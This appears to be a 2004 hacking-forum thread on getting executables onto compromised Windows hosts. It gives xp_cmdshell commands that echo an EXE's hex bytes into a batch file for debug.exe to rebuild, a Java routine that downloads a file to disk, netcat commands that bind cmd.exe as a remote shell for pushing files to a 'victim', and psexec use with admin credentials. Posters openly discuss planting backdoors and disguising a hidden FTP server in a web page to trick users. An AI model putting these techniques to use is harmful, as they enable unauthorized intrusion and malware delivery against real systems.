hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > System Security > Windows Systems
Pages: 1, 2, 3, 4
2Fa$t
Apr 23 2004, 10:41 PM
QUOTE (The Storm @ Apr 20 2004, 01:48 PM)
on SQLEXEC2 (posted in DL section) u can put a few commands in one by binding them with a & but there is no space f.e.

echo line 1 >> test.txt&echo line 2 >> test.txt&echo line 3 >> test.txt&...

I think ther should be no space. And i don`t know if SQLEXEC2 can handle so many echo commands! if someone put a & after each line pls post the txt here!

It will work for sql! there you dont have to paste it line by line!
I think a cmd(shell) would get stuck by pasting such huge text but i think with SQLEXEC2 it works just great!
rh+
Apr 24 2004, 06:11 PM
couldn't find sqlexec2 in downloads
also searched throught the net, no results.can anyone share it with us ? rolleyes.gif

regards
B1G
Apr 26 2004, 05:12 PM
QUOTE (The Storm @ Apr 22 2004, 08:55 AM)
@B1G what way did u use to make the bat on the remote SQL?

i use query analyzer

you can run many lines of code like this

QUOTE

EXEC [master].[dbo].[xp_cmdshell] "ECHO @ECHO OFF^>1>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00^>^>1>>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00^>^>1>>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68^>^>1>>c:\winnt\system32\ftp.bat"
EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F^>^>1>>c:\winnt\system32\ftp.bat"
ShadowRun
Apr 26 2004, 05:29 PM
already posted on codelinx but someone might find it usefull wink.gif

all you need is j2sdk installed

this is just a method you can use in any program or echo a class to file
compile and run wink.gif

CODE
public static String down(String from, String to){
      try{
          HttpURLConnection connection = (HttpURLConnection) new URL(from).openConnection();
          connection.setRequestMethod("GET");
          connection.connect();
          InputStream is = connection.getInputStream();
          FileOutputStream os= new FileOutputStream(new File(to));
          int i = 0;
          while ((i = is.read()) != -1)
              os.write(i);
          is.close();
          os.close();
          connection.disconnect();
      }
      catch(Exception e){
          return e.getMessage();
      }
      return null;
  }


usage:
down("http://www.somesite.com/ftp.exe","c:\\ftp.exe");

dont forget the http://
and
\\ or / instead of \


greetz
el33t
May 4 2004, 06:21 AM
something like uuencode/uudecode in *nix, but use debug here;)
brainbuster
May 4 2004, 05:27 PM
thats what is called a real good thread :-D
this rox^^
strohunter
May 4 2004, 07:04 PM
peraps you should upx ftp.exe before create your batch file ^^;
brainbuster
May 6 2004, 09:44 PM
hi

i Did that for a few command line tools:
cmdtools.zip

and coded a GUI so you can script every .exe that way:
exe-script GUI

hf
brainbuster
spyfire
May 8 2004, 07:14 PM
very nice man, it is a really good method to copy files!
LittleHacker
May 8 2004, 07:28 PM
It doesn't work on Win ME !
mrfastass
May 9 2004, 01:07 AM
didnt understand it, and how i make those files, and i little background on how it works..? tnx smile.gif
LittleHacker
May 9 2004, 05:57 AM
I think the problem is with double > character.
Windows ME has a 16 bit shell and does not support all commands of NT serries!
ghoststone
May 10 2004, 07:47 AM
QUOTE (brainbuster @ May 6 2004, 09:44 PM)
hi

i Did that for a few command line tools:
cmdtools.zip

and coded a GUI so you can script every .exe that way:
exe-script GUI

hf 
brainbuster

i think this is

cmdtools.zip
biggrin.gif
Yosam
May 12 2004, 01:32 PM
Help guys,

I tried doing it with wget.exe (not the one posted here, the one which weights 159KB).

It didn't work for me, i used the software someone posted here (cmdtools etc),

It just creates an empty wget.exe file.

Please help me.
101
May 13 2004, 02:34 PM
I add here ftp.txt from a win2k SP4 english, what is better with it ?

-smaller , -450 lines to debug
-works now without problems on winXP & win2K & win9x (tested)

A small tip now if you wanna use secureCRT in listening mode to be able then to copy paste the huge .txt without problems:

-*example*-

your localip = 192.168.0.2
run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT , do a simple telnet connection on 192.168.0.2:12345 (youll have a shell of course on your own computer trough securecrt)
Open now another listening netcat2 through this local sCRT shell, you'll be able finally to copy paste this huge txt if a victim spawn a shell to this netcat2 ;p

bye.
tonikgin
May 13 2004, 10:40 PM
QUOTE (LittleHacker @ May 8 2004, 07:28 PM)
It doesn't work on Win ME !

Gee, i wonder why. Maybe if you didnt use the shittiest OS version ever made.

Try 2000, (filtered) xp unless your a massive gamer
Lanig
May 15 2004, 08:00 PM
hmm just thinking... by u can transfer any file without having ftp/tftp/vbs/rcp access
u can just use the ftp.bat (the bat it creates when first executing) and running on ur computer
nc.exe -L -p [PORT] < ftp.bat
and then on the remote shell:
telnet -f ftp.bat [YOURIP] [PORT]
that will create the ftp.bat and all u need to do is execute it and of course u can instead up backdoors or scanners or "ur system is vulnerable" txt (im sure that will be the most popular tongue.gif )
bad thing is that ur shell might die cuz telnet do that sometimes
and the reason u cant use it to transfer any file because telnet have a 70 char limit in every line, if u transfer more the data will be moved to the next line and the exe will be corrupted
147111
May 16 2004, 04:29 AM
The only trouble with cmdget.exe if I remember right is that it executes the file once it has been downloaded, so if u dont want the file to run you have to remove the extention when u specify where u want to save it.. eg c:\test not c:\test.exe but it would be alot smaller than ftp.exe so maybe its quicker
radien
May 18 2004, 08:21 PM
Really Nasty method

Thx buddy
ANORIUS
May 18 2004, 09:33 PM
Is there some way to do this in exe-to-html... it would be ALOT easyer to trick someone with a http file who contained som pictures, alittle text and a hidden ftp-server hex-code tongue.gif

i would love to make one myself but im no http programmer (sorry)...
(some feedback plz)
DMX2
May 18 2004, 11:31 PM
Wowieee...

This is some nice work of you..


Tested it and its working fine...Nice work...

Greetzzz
toska
May 19 2004, 12:20 AM
very well done guys!
147111
May 19 2004, 11:37 AM
The only trouble with cmdget.exe if I remember right is that it executes the file once it has been downloaded, so if u dont want the file to run you have to remove the extention when u specify where u want to save it.. eg c:\test not c:\test.exe but it would be alot smaller than ftp.exe so maybe its quicker
PulpFiction
May 25 2004, 12:08 AM
well ... tested it on my machine ... worked fine ;D
thanks a lot ;D
Mrwh!P
May 25 2004, 11:02 AM
great methods in thease thread,i´ll test them all :)

thx for it

so long Mrwh!P
kok
May 25 2004, 05:38 PM
it's a very good tools you've shared

more thx wink.gif
macca
May 26 2004, 02:21 PM
all i can say is that this is very sexy.. big thx wink.gif 10/10
Uli
May 26 2004, 09:13 PM
heh awesome thx smile.gif
o0oKARo0o
May 26 2004, 10:55 PM
That´s very nice, but how do you get the binary codes for .exe?
How could I get the code for small applications so I don´t have to upload them but just create them straight away on the victim´s HD?
B1G
May 31 2004, 09:56 PM
i tried with nc.exe but it doesn't work, the resulting exe gives error

Can someone post the bat for nc.exe?

Please..
101
Jun 1 2004, 08:14 AM
In attachement is the tool i used to do it.
You have to do some modification to the .bat created to make it smaller then in a txt.
Take my ftp.txt for an example.

Also a tip: Windows XP & maybe others, cant debug something to make it .exe,
thats why in my ftp.txt, windows debug it to ftp.sys , then it rename it in ftp.exe.

also big thx to SAD1c which build this handy proggie.
B1G
Jun 1 2004, 09:11 AM
thank you very much! it works!

Now how can i make the bat smaller then the txt?
strasharo
Jun 1 2004, 12:03 PM
Thank you very much 101. smile.gif
CarTmanKILL
Jun 1 2004, 06:25 PM
year!!!!!!!!! a very nice method i have to test it smile.gif hé hé smile.gif
KieMaN
Jun 2 2004, 12:16 AM
nice work
illwill
Jun 2 2004, 03:24 AM
i fixed cmdget so it gives you the option to excute when downloaded .. get it at http://illmob.org
o0oKARo0o
Jun 15 2004, 04:45 AM
Great new, thanks for that, your website is so interesting, full of tools and apps that make life easier to evety haxxors..
Great work, carry on biggrin.gif
DumpZ
Jun 15 2004, 07:23 AM
True, and in 10 years every person who can get a hold of hacking tools is immeately an hacker without maybe even knowning what an OS is tongue.gif
101
Jun 18 2004, 03:38 PM


2 new tips added , 1 to use secureCRT in listening mode , and another one, when
you are on an admin/system shell with the impossibility to copy paste the huge .txt

bye.

jamezz98
Jun 26 2004, 01:35 AM
Great thread. Gonna give this a go...i never knew windows could build exe files in this way. Great tools and tutorial 101 smile.gif
dijk
Jul 11 2004, 07:58 AM
incredibly - it works very very well for me. thx allot bro!
Kralle
Jul 11 2004, 02:22 PM
thx! for this nice tools!
Peter4020
Aug 3 2004, 01:17 AM
QUOTE (easternerd @ Mar 14 2004, 07:33 PM)
Innovation is the KeyWord
i really Congratualte 101 for
showing a very simple yet
impressive method where we
can take advantage of just
the Swiss Army Knife alone.

lol
illwill
Aug 3 2004, 02:46 AM
hey peter how have you been .. havent seen your messenger online much
R0x0r
Aug 3 2004, 07:05 AM
This is just great m8.. U really r0x that shit.. Thnx a lot for the great method smile.gif
Icingtaupe
Aug 21 2004, 09:26 PM
Eek, I'm late, again ...

I want to give a huge thanks to 101 for this method, and to all who have give a effort into that method, like the "better" ftp.txt and all proggies :-)

Thanks a lots guys, really, it is very very interesting ...
net_runner
Aug 25 2004, 08:08 AM
what could im doing wrong when i try to mix secucrt & psexec?

im running nc in MY machine
i have the paswa of VM (virtual machine) (192.168.1.101)

i conected trough SECURECRT to MY machine
and then

inside SECUREcrt i execute psexec to conect to VM

QUOTE
D:\>psexec \\192.168.1.101 -u Administrator -p test cmd
psexec \\192.168.1.101 -u Administrator -p test cmd

PsExec v1.43 - execute processes remotely
Copyright © 2001-2003 Mark Russinovich
www.sysinternals.com
                                                                           
cmd exited on 192.168.1.101 with error code 0


so, what should i do to execute comands?
fulvioo
Aug 28 2004, 01:02 AM
nc in "echo method" smile.gif
just dont forget to rename nc.sys to nc.exe when it ends
opus
Sep 11 2004, 03:19 PM
nice method
thanks for share it
flashlord
Oct 22 2004, 01:03 PM
hmmmm
ftp.exe says(used securecrt and ftp.txt from page 8):

This program cannot be run in DOS mode.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.